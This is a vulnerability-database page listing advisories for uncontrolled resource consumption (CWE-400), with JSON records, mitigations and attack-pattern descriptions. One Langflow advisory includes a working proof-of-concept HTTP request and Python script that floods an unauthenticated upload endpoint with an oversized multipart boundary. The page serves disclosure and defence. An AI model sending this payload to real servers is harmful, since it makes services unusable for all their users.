Common Weakness Enumeration

CWE-400

Discouraged

Uncontrolled Resource Consumption

Abstraction: Class · Status: Draft

The product does not properly control the allocation and maintenance of a limited resource.

5423 vulnerabilities reference this CWE, most recent first.

GHSA-QWP9-52H8-XGG8

Vulnerability from github – Published: 2021-01-20 21:21 – Updated: 2021-01-20 05:24
VLAI
Summary
Prototype pollution in JointJS
Details

The package jointjs before 3.3.0 are vulnerable to Prototype Pollution via util.setByPath (https://resources.jointjs.com/docs/jointjs/v3.2/joint.htmlutil.setByPath). The path used the access the object's key and set the value is not properly sanitized, leading to a Prototype Pollution.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "jointjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-28480"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-01-20T05:24:47Z",
    "nvd_published_at": "2021-01-19T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "The package jointjs before 3.3.0 are vulnerable to Prototype Pollution via util.setByPath (https://resources.jointjs.com/docs/jointjs/v3.2/joint.htmlutil.setByPath). The path used the access the object\u0027s key and set the value is not properly sanitized, leading to a Prototype Pollution.",
  "id": "GHSA-qwp9-52h8-xgg8",
  "modified": "2021-01-20T05:24:47Z",
  "published": "2021-01-20T21:21:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28480"
    },
    {
      "type": "WEB",
      "url": "https://github.com/clientIO/joint/pull/1406"
    },
    {
      "type": "WEB",
      "url": "https://github.com/clientIO/joint/blob/master/src/util/util.mjs%23L150"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1062037"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1062036"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-JOINTJS-1024444"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Prototype pollution in JointJS"
}

GHSA-QWPM-PPC7-2RRR

Vulnerability from github – Published: 2022-05-24 17:26 – Updated: 2022-05-24 17:26
VLAI
Details

In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management Microkernel (TMM) may stop responding when processing Stream Control Transmission Protocol (SCTP) traffic when traffic volume is high. This vulnerability affects TMM by way of a virtual server configured with an SCTP profile.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-5918"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-08-26T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management Microkernel (TMM) may stop responding when processing Stream Control Transmission Protocol (SCTP) traffic when traffic volume is high. This vulnerability affects TMM by way of a virtual server configured with an SCTP profile.",
  "id": "GHSA-qwpm-ppc7-2rrr",
  "modified": "2022-05-24T17:26:46Z",
  "published": "2022-05-24T17:26:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5918"
    },
    {
      "type": "WEB",
      "url": "https://support.f5.com/csp/article/K26464312"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-QWQC-P3Q8-WCG9

Vulnerability from github – Published: 2026-06-19 21:17 – Updated: 2026-06-19 21:17
VLAI
Summary
Langflow: Unauthenticated DoS through multipart form boundary file upload
Details

Summary

An attacker can send a /api/v1/files/upload/ request without any authentication token/cookies and abuse a very long multipart form boundary to make the langflow app unusable for all users for an indefinite amount of time.

Details

https://github.com/langflow-ai/langflow/blob/v1.0.18/src/backend/base/langflow/api/v1/files.py#L40

The file upload function will try to process the multipart form data even if it is malformed and contains a payload such as an extremely large amount of hyphens after the boundary. It also does not do the authentication check before trying to process this data so an unauthenticated attacker can perform this as well as authenticated users.

Additionally, an attacker doesn't even need to know a valid UUID of a flow to send this request because the server will still try to process the large boundary even with any random value in place of the flow ID.

PoC

An attacker makes this request to upload a file without valid authentication information or a valid flow ID:

POST /api/v1/files/upload/test HTTP/1.1
Host: 127.0.0.1:7860
Content-Length: 3000192
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryorGBAKSkv5wR6WqJ
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:7860
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryorGBAKSkv5wR6WqJ
Content-Disposition: form-data; name="file"; filename="dos.txt"
Content-Type: text/plain

DoS in progress!

------WebKitFormBoundaryorGBAKSkv5wR6WqJ------------<insert a large amount of hyphens such as 1,000,000>

Here is the request in python:

import requests

url = "http://127.0.0.1:7860/api/v1/files/upload/test"

headers = {
    "Content-Type": "multipart/form-data; boundary=---------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ"
}

data = (
    "-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ\r\n"
    "Content-Disposition: form-data; name=\"file\"; filename=\"dos.txt\"\r\n"
    "Content-Type: text/plain\r\n\r\n"
    "DoS in progress\r\n"
    "-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ--" + '-' * 1000000 + "\r\n"
)

response = requests.post(url, headers=headers, data=data)

The app will then be stuck in the "server is busy" state for all users:

image

Impact

Sending this request will result in the server being unusable for all users for an infinite amount of time because the request can be repeated as much as you want.

Patches

Fixed in 1.0.19 via PR #3923. A check_boundary HTTP middleware was added that validates the multipart boundary (^[\w\-]{1,70}$) and rejects malformed requests — including the oversized-hyphen payload — with HTTP 422 before the body is parsed. The upload endpoint also gained an authentication and flow-ownership check (get_current_active_user + 403 on mismatch), closing the unauthenticated access vector. Upgrade to 1.0.19 or later.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "langflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55446"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T21:17:37Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nAn attacker can send a `/api/v1/files/upload/` request without any authentication token/cookies and abuse a very long multipart form boundary to make the langflow app unusable for all users for an indefinite amount of time. \n\n### Details\nhttps://github.com/langflow-ai/langflow/blob/v1.0.18/src/backend/base/langflow/api/v1/files.py#L40\n\nThe file upload function will try to process the multipart form data even if it is malformed and contains a payload such as an extremely large amount of hyphens after the boundary. It also does not do the authentication check before trying to process this data so an unauthenticated attacker can perform this as well as authenticated users. \n\nAdditionally, an attacker doesn\u0027t even need to know a valid UUID of a flow to send this request because the server will still try to process the large boundary even with any random value in place of the flow ID. \n\n### PoC\n\nAn attacker makes this request to upload a file without valid authentication information or a valid flow ID: \n\n```\nPOST /api/v1/files/upload/test HTTP/1.1\nHost: 127.0.0.1:7860\nContent-Length: 3000192\nAccept-Language: en-US,en;q=0.9\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryorGBAKSkv5wR6WqJ\nAccept: application/json, text/plain, */*\nOrigin: http://127.0.0.1:7860\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n\n------WebKitFormBoundaryorGBAKSkv5wR6WqJ\nContent-Disposition: form-data; name=\"file\"; filename=\"dos.txt\"\nContent-Type: text/plain\n\nDoS in progress!\n\n------WebKitFormBoundaryorGBAKSkv5wR6WqJ------------\u003cinsert a large amount of hyphens such as 1,000,000\u003e\n```\n\nHere is the request in python: \n\n```python\nimport requests\n\nurl = \"http://127.0.0.1:7860/api/v1/files/upload/test\"\n\nheaders = {\n    \"Content-Type\": \"multipart/form-data; boundary=---------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ\"\n}\n\ndata = (\n    \"-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ\\r\\n\"\n    \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"dos.txt\\\"\\r\\n\"\n    \"Content-Type: text/plain\\r\\n\\r\\n\"\n    \"DoS in progress\\r\\n\"\n    \"-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ--\" + \u0027-\u0027 * 1000000 + \"\\r\\n\"\n)\n\nresponse = requests.post(url, headers=headers, data=data)\n```\n\nThe app will then be stuck in the \"server is busy\" state for all users:\n\n\u003cimg width=\"733\" alt=\"image\" src=\"https://github.com/user-attachments/assets/227169d8-f1b7-4072-8c09-e416e4808d05\"\u003e\n\n### Impact\nSending this request will result in the server being unusable for all users for an infinite amount of time because the request can be repeated as much as you want.\n\n### Patches\nFixed in **1.0.19** via PR [#3923](https://github.com/langflow-ai/langflow/pull/3923). A `check_boundary` HTTP middleware was added that validates the multipart boundary (`^[\\w\\-]{1,70}$`) and rejects malformed requests \u2014 including the oversized-hyphen payload \u2014 with `HTTP 422` **before** the body is parsed. The upload endpoint also gained an authentication and flow-ownership check (`get_current_active_user` + `403` on mismatch), closing the unauthenticated access vector. Upgrade to **1.0.19 or later**.",
  "id": "GHSA-qwqc-p3q8-wcg9",
  "modified": "2026-06-19T21:17:37Z",
  "published": "2026-06-19T21:17:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-qwqc-p3q8-wcg9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/pull/3923"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langflow-ai/langflow"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/blob/v1.0.18/src/backend/base/langflow/api/v1/files.py#L40"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Langflow: Unauthenticated DoS through multipart form boundary file upload"
}

GHSA-QWVM-WQQ8-8J69

Vulnerability from github – Published: 2025-09-30 21:06 – Updated: 2025-10-23 20:34
VLAI
Summary
github.com/MANTRA-Chain/mantrachain/x/tokenfactory tx gas limit is not enforced in send hooks
Details

Impact

send hooks can spend more gas than what's remained in tx, combined with recursive calls in the wasm contract, can amplify the gas consumption exponentially.

Patches

It's patched in v4.0.2 and v5.0.0

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/MANTRA-Chain/mantrachain/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 4.0.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/MANTRA-Chain/mantrachain/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 4.0.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/MANTRA-Chain/mantrachain/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 4.0.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/MANTRA-Chain/mantrachain"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-61595"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-30T21:06:02Z",
    "nvd_published_at": "2025-10-02T20:15:35Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nsend hooks can spend more gas than what\u0027s remained in tx, combined with recursive calls in the wasm contract, can amplify the gas consumption exponentially.\n\n### Patches\n\nIt\u0027s patched in v4.0.2 and v5.0.0\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_",
  "id": "GHSA-qwvm-wqq8-8j69",
  "modified": "2025-10-23T20:34:29Z",
  "published": "2025-09-30T21:06:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MANTRA-Chain/mantrachain/security/advisories/GHSA-qwvm-wqq8-8j69"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61595"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MANTRA-Chain/mantrachain/issues/432"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MANTRA-Chain/mantrachain/commit/30d36c46e9823b56b8f0dcbb66e980ca5df284e4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MANTRA-Chain/mantrachain"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3997"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "github.com/MANTRA-Chain/mantrachain/x/tokenfactory tx gas limit is not enforced in send hooks"
}

GHSA-QWW3-WJFF-2GJ7

Vulnerability from github – Published: 2022-05-01 07:30 – Updated: 2025-04-03 18:30
VLAI
Details

Unspecified vulnerability in the "alignment check exception handling" in Ubuntu 5.10, 6.06 LTS, and 6.10 for the PowerPC (PPC) allows local users to cause a denial of service (kernel panic) via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2006-5649"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2006-12-14T00:28:00Z",
    "severity": "MODERATE"
  },
  "details": "Unspecified vulnerability in the \"alignment check exception handling\" in Ubuntu 5.10, 6.06 LTS, and 6.10 for the PowerPC (PPC) allows local users to cause a denial of service (kernel panic) via unspecified vectors.",
  "id": "GHSA-qww3-wjff-2gj7",
  "modified": "2025-04-03T18:30:27Z",
  "published": "2022-05-01T07:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-5649"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/23361"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/23370"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/23384"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/23395"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/23474"
    },
    {
      "type": "WEB",
      "url": "http://www.novell.com/linux/security/advisories/2006_79_kernel.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/21523"
    },
    {
      "type": "WEB",
      "url": "http://www.ubuntu.com/usn/usn-395-1"
    },
    {
      "type": "WEB",
      "url": "http://www.us.debian.org/security/2006/dsa-1233"
    },
    {
      "type": "WEB",
      "url": "http://www.us.debian.org/security/2006/dsa-1237"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QX2F-477C-35RQ

Vulnerability from github – Published: 2018-07-24 20:06 – Updated: 2023-09-11 18:24
VLAI
Summary
method-override ReDoS when untrusted user input passed into X-HTTP-Method-Override header
Details

Affected versions of method-override are vulnerable to a regular expression denial of service vulnerability when untrusted user input is passed into the X-HTTP-Method-Override header.

Recommendation

Update to version 2.3.10 or later

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "method-override"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.2"
            },
            {
              "fixed": "2.3.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.0.2"
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "method-override"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.3.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2017-16136"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:53:07Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Affected versions of `method-override` are vulnerable to a regular expression denial of service vulnerability when untrusted user input is passed into the `X-HTTP-Method-Override` header.\n\n\n## Recommendation\n\nUpdate to version 2.3.10 or later",
  "id": "GHSA-qx2f-477c-35rq",
  "modified": "2023-09-11T18:24:36Z",
  "published": "2018-07-24T20:06:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16136"
    },
    {
      "type": "WEB",
      "url": "https://github.com/expressjs/method-override/commit/4c58835a61fdf7a8e070d6f8ecd5379a961d0987"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/expressjs/method-override"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/538"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "method-override ReDoS when untrusted user input passed into X-HTTP-Method-Override header"
}

GHSA-QX4V-6GC5-F2VV

Vulnerability from github – Published: 2019-06-20 14:32 – Updated: 2021-02-25 17:20
VLAI
Summary
Regular Expression Denial of Service
Details

A Regular Expression Denial of Service vulnerability was discovered in esm before 3.1.0. The issue is that esm's find-indexes is using the unescaped identifiers in a regex, which, in this case, causes an infinite loop.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "esm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2019-06-20T14:17:20Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "A Regular Expression Denial of Service vulnerability was discovered in esm before 3.1.0. The issue is that esm\u0027s find-indexes is using the unescaped identifiers in a regex, which, in this case, causes an infinite loop.",
  "id": "GHSA-qx4v-6gc5-f2vv",
  "modified": "2021-02-25T17:20:28Z",
  "published": "2019-06-20T14:32:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/standard-things/esm/issues/694"
    },
    {
      "type": "WEB",
      "url": "https://github.com/standard-things/esm/commit/c41e001d81a5a52b0d2d1722b1c2af04d997c05b"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Regular Expression Denial of Service"
}

GHSA-QXJJ-WXG4-3FHM

Vulnerability from github – Published: 2022-05-24 19:07 – Updated: 2022-07-11 00:00
VLAI
Details

Mikrotik RouterOs before 6.47 (stable tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/route process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-20217"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-07-08T12:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Mikrotik RouterOs before 6.47 (stable tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/route process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU.",
  "id": "GHSA-qxjj-wxg4-3fhm",
  "modified": "2022-07-11T00:00:21Z",
  "published": "2022-05-24T19:07:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-20217"
    },
    {
      "type": "WEB",
      "url": "https://cwe.mitre.org/data/definitions/400.html"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cq674350529/pocs_slides/blob/master/advisory/MikroTik/CVE-2020-20217/README.md"
    },
    {
      "type": "WEB",
      "url": "https://mikrotik.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QXM3-G494-7WXR

Vulnerability from github – Published: 2025-09-04 21:31 – Updated: 2025-09-04 21:31
VLAI
Details

In multiple functions of AccountManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-48542"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-04T19:15:40Z",
    "severity": "MODERATE"
  },
  "details": "In multiple functions of AccountManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.",
  "id": "GHSA-qxm3-g494-7wxr",
  "modified": "2025-09-04T21:31:38Z",
  "published": "2025-09-04T21:31:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48542"
    },
    {
      "type": "WEB",
      "url": "https://android.googlesource.com/platform/frameworks/base/+/7ed50e5b5d568bc8be5d3603991aa9add67a7f44"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2025-09-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QXXC-W5WG-5W4V

Vulnerability from github – Published: 2024-05-07 21:31 – Updated: 2024-07-03 18:39
VLAI
Details

In multiple functions of SnoozeHelper.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-0026"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-07T21:15:08Z",
    "severity": "MODERATE"
  },
  "details": "In multiple functions of SnoozeHelper.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.",
  "id": "GHSA-qxxc-w5wg-5w4v",
  "modified": "2024-07-03T18:39:46Z",
  "published": "2024-05-07T21:31:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0026"
    },
    {
      "type": "WEB",
      "url": "https://android.googlesource.com/platform/frameworks/base/+/a8fb9fe93efdebc4145e00934f42c91742f328de"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2024-04-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Mitigation
Architecture and Design
  • Mitigation of resource exhaustion attacks requires that the target system either:
  • The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
  • The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
  • recognizes the attack and denies that user further access for a given amount of time, or
  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Mitigation
Implementation

Ensure that all failures in resource allocation place the system into a safe posture.

CAPEC-147: XML Ping of the Death

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

CAPEC-227: Sustained Client Engagement

An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.